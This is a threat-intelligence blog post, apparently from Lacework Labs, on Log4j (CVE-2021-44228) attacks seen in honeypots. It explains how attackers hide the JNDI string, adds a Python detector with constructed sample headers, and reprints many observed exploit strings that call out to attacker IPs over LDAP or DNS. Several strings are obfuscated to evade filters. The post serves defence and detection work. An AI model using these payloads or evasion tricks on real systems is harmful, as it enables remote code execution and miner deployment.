Log4j Attacks – A Week in Review
Key Takeaways
- Log4J Vulnerabilities (CVE-2021-44228, CVE-2021-45046) are being exploited by opportunistic attackers.
- Evasion techniques are being employed to subvert detection.
Overview
A week into the Log4J vulnerability that is impacting just about every industry, there has been patching, re-patching, and wider adoption of this vulnerability by attackers. Lacework Labs has continued to closely monitor the situation and continues to see Mirai, Kinsing and cryptocurrency miners being distributed, as originally reported in this blog a week ago. While the first patch left open the potential for a DoS attack (CVE-2021-45046), Lacework Labs has not seen that issue exploited. Over time, more of the initial JNDI strings have been obfuscated in an attempt to subvert detection. An example of payloads Lacework Labs saw being used last weekend, alongside payloads being used today, can be seen in the image above. This blog post highlights some of the techniques Lacework Labs has identified.
Where to Put The Payload?
Given the ubiquitous use of the Log4J library in enterprise and open source software, organizations have found it difficult to identify every place where they might be vulnerable. For example, a web server not running any software that uses Log4J may receive a payload that exploits CVE-2021-44228 and not be impacted. However, a log forwarder (e.g. syslog) would pass that server’s logs on to a logging stack that may use Log4J, causing the payload to be executed deeper within the network.
These delayed payload executions are attractive to attackers looking to move deeper into a network, but they also raise the question of where to put the payload string. Lacework Labs has observed opportunistic attackers placing the JNDI exploitation string in numerous fields of an HTTP request, including the User-Agent and Referer headers. Interestingly, in certain circumstances the same payload was used with different string evasion techniques. Two examples can be seen below.
GET / x:%24%7Bjndi%3Aldap%3A%2F%2F142.44.203.85%3A1389%2FBasic%2FCommand%2FBase64%2F<REDACTED_PAYLOAD>
referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
x-forwarded-for: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
user-agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
Figure 1 – Payload Obfuscation
GET / HTTP/1.1
X-Api-Version: ${jndi:ldap://135.148.143.217:1389/<REDACTED_PAYLOAD>}
User-Agent: ${jndi:ldap://135.148.143.217:1389/<REDACTED_PAYLOAD>}
Referer: ${jndi:ldap://135.148.143.217:1389/<REDACTED_PAYLOAD>}
host: <REDACTED>
Connection: close\r\n\r\n
Figure 2 – Payload Obfuscation 2
Delayed execution further lowers the bar for opportunistic attackers looking to deploy cryptocurrency miners. After sending an RCE payload that downloads and executes a bash script to deploy a cryptocurrency miner, they only need to keep the initial bash script hosted; log forwarding may then spread the payload throughout an environment.
Observed Technique – String Manipulation
Typically, the format of the exploit string is as follows:
${jndi:ldap://<attackers_ip_address>:<attacker_port>/path/to/resource}
Figure 3 - Original PoC Exploit String
Lacework Labs has observed string concatenation to build various portions of the exploit string such as “ldap” as shown in the table below.
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://<REDACTED>
Figure 4 - Payload string Modification 1
While this technique was reported in our original blog, it has since been extended to cover the “JNDI” portion of the string as well. Lacework Labs has identified the JNDI portion of the Log4J proof-of-concept exploits being stored in the User-Agent header of HTTP requests.
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<REDACTED>
Figure 5 - Payload string Modification 2
User-Agent: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://<REDACTED>
Figure 6 - Payload string Modification 3
These simple string manipulations highlight the need for verbose detections, rather than simple static rules, in order to cover the variety of payloads attackers will continue to modify and adapt to the latest detection bypasses. Perhaps the most aggressive evasion payload can be observed below, where the JNDI, LDAP, and IP portions of the payload were obfuscated along with the Tomcat path being targeted.
User-Agent: ekausif/3.1 ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}
Accept: */*
Bearer: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}
Authentication: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}
X-Requested-With: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}
X-Requested-For: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}
X-Api-Version: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}
Referer: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}
Figure 7 - Payload string Modification 4
Observed Technique – DNS Lookups
Modifying the JNDI exploit string to perform DNS lookups allows individuals to test whether a server is vulnerable to Log4J without executing an actual payload against the victim. Instead, a DNS request for a particular DNS record is issued from the target machine. This can also be performed via the “ldap” JNDI directive, and our friends at Thinkst have a blog post on how to achieve this. Lacework Labs has identified this behavior being used to “scan” for vulnerable hosts, as can be seen in the images below.
${jndi:ldap://x${hostName}.L4J.p5k9q4p8cdf6n8wv0fw73jqut.canarytokens.com/a
Figure 8 - Canarytokens in JNDI String
user-agent: ${${::-j}ndi:dns://45.83.64.1/securityscan-w6dvor7c5l4b6ztz
Figure 9 - Payload string Modification for DNS
A further concerning use of this technique was highlighted by security researcher Zander Work, who showed how it could be used for theft of sensitive environment variables/API keys. Lacework Labs has not seen that particular event within its honeypots; however, the environment variable manipulation technique was observed being adopted to build “JNDI” strings.
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//
Figure 10 - Payload string Modification 4
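The string manipulations in Figures 4 to 7 and the environment-variable form in Figure 10 all collapse to the same canonical `${jndi:<scheme>:` once Log4j evaluates its lookups, so a detection that normalises first does not need one rule per spelling. The following Python normaliser is an added example, not code from the Lacework post: it URL-decodes once (Figure 1 style), statically resolves `${lower:x}`, `${upper:x}`, `${::-x}` and `${env:NAME:-x}`, and then matches the surviving JNDI lookup; the header values and 192.0.2.x addresses are constructed, and the `:-` rule assumes the referenced environment variables are unset on the victim, which is what lets the attacker-supplied default win.

```python
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body holds no further "${" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup that survives normalisation; group 1 is its scheme (ldap, dns, ...).
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

def resolve_lookup(body):
    """Statically resolve one lookup body; None means it cannot be resolved."""
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "jndi":
        return None  # keep the dangerous lookup in place so JNDI can match it
    if ":-" in body:  # env:/sys: vars assumed unset, so ${env:X:-j} and ${::-j} -> 'j'
        return body.split(":-", 1)[1]
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return None  # hostName, date, ... are left untouched

def _collapse(match):
    resolved = resolve_lookup(match.group(1))
    return match.group(0) if resolved is None else resolved

def normalize(value):
    """URL-decode once, then collapse resolvable innermost lookups until stable."""
    value = unquote(value)
    for _ in range(32):  # each pass removes one nesting level; bound pathological input
        collapsed = INNER.sub(_collapse, value)
        if collapsed == value:
            break
        value = collapsed
    return value

def scan_headers(headers):
    """Return (header name, JNDI scheme) for every header value carrying a lookup."""
    found = [(name, JNDI.search(normalize(raw))) for name, raw in headers.items()]
    return [(name, m.group(1).lower()) for name, m in found if m]

# Constructed request modelled on Figures 1, 4-7, 9 and 10; 192.0.2.x is TEST-NET, not a real host.
SAMPLE_REQUEST = {
    "Query": "x=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A1389%2Fa%7D",
    "User-Agent": "${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-9}2.0.2.10:44${::-3}/${::-o}=${::-t}omca${::-t}}",
    "Referer": "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://192.0.2.10:1389/a}",
    "X-Api-Version": "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//192.0.2.10/a}",
    "X-Forwarded-For": "${${::-j}ndi:dns://192.0.2.10/securityscan-example}",
    "Accept": "*/*",
}
```

`scan_headers(SAMPLE_REQUEST)` flags the first five fields (four as `ldap`, X-Forwarded-For as `dns`) and leaves Accept alone; an unresolvable inner lookup such as the `${hostName}` in Figure 8 is left in place and the outer `${jndi:ldap:` still matches.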
Conclusion
Opportunistic attackers continue to leverage Log4J vulnerabilities to spread a variety of bots (Kinsing, Mirai, Muhstik) and cryptocurrency miners. The modification of the exploitation string demonstrates adversaries rapidly adapting to the research being published. Having a verbose detection strategy against these payloads is critical to avoid a “whack-a-mole” situation of detecting specific strings.
Understanding where Log4J exists in your environment is no easy task, nor is mitigating the vulnerability. Given the dynamic nature of the situation, Lacework Labs recommends following the official Log4J security advisory guidance, as well as vendors’ security guidance for their software, when making internal security decisions.
For more content like this, follow us on Twitter and LinkedIn!
IoCs
Copyright 2021 Lacework Inc. All rights reserved.